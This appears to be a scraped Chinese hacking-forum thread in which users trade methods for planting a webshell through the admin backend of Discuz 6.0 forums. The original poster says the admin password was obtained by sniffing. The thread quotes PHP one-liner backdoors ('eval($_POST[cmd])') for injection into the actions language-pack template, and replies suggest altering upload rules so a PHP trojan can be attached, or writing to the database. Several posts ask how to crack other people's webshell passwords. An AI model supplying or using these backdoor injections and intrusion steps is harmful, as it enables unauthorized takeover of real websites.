标题:
[讨论]关于discuz6.0后台获取shell的方法
[打印本页]
作者:
s37su37
时间:
2008-7-20 18:05
标题:
[讨论]关于discuz6.0后台获取shell的方法
[讨论]关于discuz6.0后台获取shell的方法
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
议题作者:NEVErSayLovE
如题, 通过嗅探获得了admin的密码,进了后台,在获取shell这一步出了问题.
按照一般的说法是在模版管理里编辑语言包actions.随便找一行写入"eval($_POST[cmd]); "(没有引号).提交就写入templates/default/actions.lang.php了,但是我有客户端连接的时候没有反应.
排除一句话和url写错.
在网上找了下,说法是在最后一行-即游客一行写入
复制内容到剪贴板
代码:
游客\');?>
<?php eval($_POST[cmd]);?><?$languagex= array (
\'g\'=>\'error
依然无果.再次编辑时可以看到游客后面的那个"\"被去掉了.
请问一下大家在discuz6.0后台一般都是怎样得shell的啊,还望不吝赐教.
帖子38 精华
2
积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
赚更多的钱
neversaylove
晶莹剔透§烈日灼然
作者:
google
时间:
2008-7-20 18:05
顶一下,希望大家能帮我看看,提点建设性的意见.
毕竟网上关于discuz6.0.0后台获取shell的文章就只有一篇,而且测试不成功,能成功的方法还请牛人们透露一下啊
帖子38 精华
2
积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
liujianst
晶莹剔透§烈日灼然
作者:
山^鹰
时间:
2008-7-20 18:05
2个入侵中遇到的问题
1 拿webshell 问题
对于网站后台只有图片上传的模式 没有备份版快的怎么拿webshell 有办法吗?
2 破shell密码
今天碰到一个站 特别变态 后台超级简单 只能发文字文章
其他的什么都做不了 原因是管理员自己使用asp管理系统 就是我门所所的webshell
请问有什么办法来破shell密码吗?
帖子3 精华
0
积分10 阅读权限40 性别男 在线时间1 小时 注册时间2007-3-20 最后登录2008-7-4
查看详细资料
引用
报告
回复
TOP
您知道您年薪应是多少?
simpleboy
晶莹剔透§烈日灼然
作者:
suiyuan_5
时间:
2008-7-20 18:05
问下楼主 你对DZ6 拿到后台 是 什么方法?只做安静的观众
帖子72 精华
2
积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
ring04h
团队执行官
作者:
老游子
时间:
2008-7-20 18:05
DZ 6.0 后台拿webshell很容易, 大致上有两个位置可以!
一个模版处, 一个数据库处. (PS:不是执行SQL outfile 这种).
帖子3923 精华
128
积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
少女暴富的隐秘(图)
neversaylove
晶莹剔透§烈日灼然
作者:
liulangren
时间:
2008-7-20 18:05
4楼的ring04h 你好,邪八上经常看到你的言论,先表示敬意.
如你所说的第一种方法我已经试过了,就在帖子里已经说了不成功.不知你的第二种在数据库处具体是怎么一回事.请讲解一下,谢谢了
3楼的simpleboy, 我已经写得很清楚了是嗅探得到的.你如果还要问,我就只能说是用cain嗅探到的.
帖子38 精华
2
积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
少女暴富的隐秘(图)
ring04h
团队执行官
作者:
M58540
时间:
2008-7-20 18:05
你认真的读一下模版内容的代码, 就非常清楚了。
写模版并不是只有所谓的一种方法, 可以适当的转变下思维方式。
帖子3923 精华
128
积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
hushui
晶莹剔透§烈日灼然
作者:
binfengbin
时间:
2008-7-20 18:05
在线帮助那个模板那里可以写近代码
那第二种方法是什么呢?希望大牛给提示下技术技术 技术!!!!
帖子30 精华
0
积分95 阅读权限40 性别男 来自天边 在线时间63 小时 注册时间2006-4-28 最后登录2008-7-17
查看详细资料
引用
报告
回复
TOP
heiye88
晶莹剔透§烈日灼然
作者:
claire87
时间:
2008-7-20 18:05
被过滤掉了可能。直接写库吧... 还有当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
neversaylove
晶莹剔透§烈日灼然
作者:
Hemry
时间:
2008-7-20 18:05
谢谢ring04h的帮忙,只是我离阅读代码还有一些差距,还需要多多努力啊,总之,多谢了
帖子38 精华
2
积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
9989
晶莹剔透§烈日灼然
作者:
cartoon
时间:
2008-7-20 18:05
上天也遇到了DZ 6。0 拿到了管理员后台密码 ,只是不知道如何拿SHELL
不知道可不可以把如何拿SHELL的方法说一下? 代码,偶也没能力去阅读!
帖子5 精华
0
积分17 阅读权限40 在线时间0 小时 注册时间2007-10-23 最后登录2008-2-11
查看详细资料
引用
报告
回复
TOP
逗号
晶莹剔透§烈日灼然
作者:
粤北人
时间:
2008-7-20 18:05
楼主,方便的话,把后台PM 我,我去看看,我知道一种拿SHELL 的方法。不知道在DZ6.0 上能不能实现
非插模版,非数据库.
帖子35 精华
0
积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22
查看详细资料
引用
报告
回复
TOP
simpleboy
晶莹剔透§烈日灼然
作者:
QQ小敏
时间:
2008-7-20 18:06
以前用到一种方法
丢上来LZ可以试试
1,在后台修改某版的上传限制(允许上传PHP)
2,注册登录后 直接在该版 附件上传PHP马
3,在 控制面板 处 查看上传路径(当然去后台找也行)就等到SHELL只做安静的观众
帖子72 精华
2
积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
hackpp
晶莹剔透§烈日灼然
作者:
skylongo
时间:
2008-7-20 18:06
引用:
引用第9楼neversaylove于2007-11-18 21:31发表的 :
谢谢ring04h的帮忙,只是我离阅读代码还有一些差距,还需要多多努力啊,总之,多谢了
得到 WEBSHELL 了?具体步骤 能否告知 谢谢了!
帖子2 精华
0
积分9 阅读权限40 在线时间86 小时 注册时间2005-10-4 最后登录2008-6-2
查看详细资料
引用
报告
回复
TOP
可酷可乐
晶莹剔透§烈日灼然
作者:
qxkmay
时间:
2008-7-20 18:06
引用:
引用第8楼heiye88于2007-11-18 12:49发表的 :
被过滤掉了可能。直接写库吧... 还有当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能
这个问题我也遇到了.虽然是管理员但是什么权限都没有...
TO 12楼.貌似上传PHP文件后,在服务器里的扩展名是改过了的,不是PHP的了。
帖子59 精华
0
积分162 阅读权限40 在线时间41 小时 注册时间2005-11-5 最后登录2008-5-26
查看详细资料
引用
报告
回复
TOP
simpleboy
晶莹剔透§烈日灼然
作者:
dongdg
时间:
2008-7-20 18:06
只要记住 路径 可以打开的只做安静的观众
帖子72 精华
2
积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
cser
晶莹剔透§烈日灼然
作者:
有来游去
时间:
2008-7-20 18:06
php4
php5
asp
asa
局限性很大。
帖子2 精华
0
积分9 阅读权限40 在线时间19 小时 注册时间2006-3-12 最后登录2008-5-4
查看详细资料
引用
报告
回复
TOP
ijyq
晶莹剔透§烈日灼然
作者:
bmw
时间:
2008-7-20 18:06
我也试过在游客里插入一句话~,但也过滤了.
请版主或者逗号说下具体怎么说好么~本人菜鸟一个正为这个犯愁呢谢谢
帖子2 精华
0
积分9 阅读权限40 在线时间1 小时 注册时间2006-2-18 最后登录2008-6-1
查看详细资料
引用
报告
回复
TOP
neversaylove
晶莹剔透§烈日灼然
作者:
死性不改
时间:
2008-7-20 18:06
引用:
引用第11楼逗号于2007-12-02 13:46发表的 :
楼主,方便的话,把后台PM 我,我去看看,我知道一种拿SHELL 的方法。不知道在DZ6.0 上能不能实现
非插模版,非数据库.
我们学校内网的,外面访问不了啊.
to simpleboy: 你哪个方法在discuz6里貌似没有用武之地了啊
帖子38 精华
2
积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
杀虫剂
晶莹剔透§烈日灼然
作者:
超越
时间:
2008-7-20 18:06
当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能
请求这种得SHELL的方法。黎叔很生气
帖子70 精华
0
积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
黑暗传说
晶莹剔透§烈日灼然
作者:
yuxianglin
时间:
2008-7-20 18:06
看一下是不是把你提交的代码给过了里了
帖子17 精华
0
积分-121 阅读权限1 在线时间9 小时 注册时间2008-3-19 最后登录2008-6-13
查看详细资料
引用
报告
回复
TOP
柔肠寸断
晶莹剔透§烈日灼然
作者:
剑花江南
时间:
2008-7-20 18:06
请问楼主cain嗅探怎么获取论坛登录密码的?
一般我们都是用它来获取3389密码的
想在此领教下
谢谢
帖子14 精华
0
积分216 阅读权限40 在线时间28 小时 注册时间2008-5-17 最后登录2008-7-20
查看详细资料
编辑
引用
报告
回复
TOP
yese
夜色
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2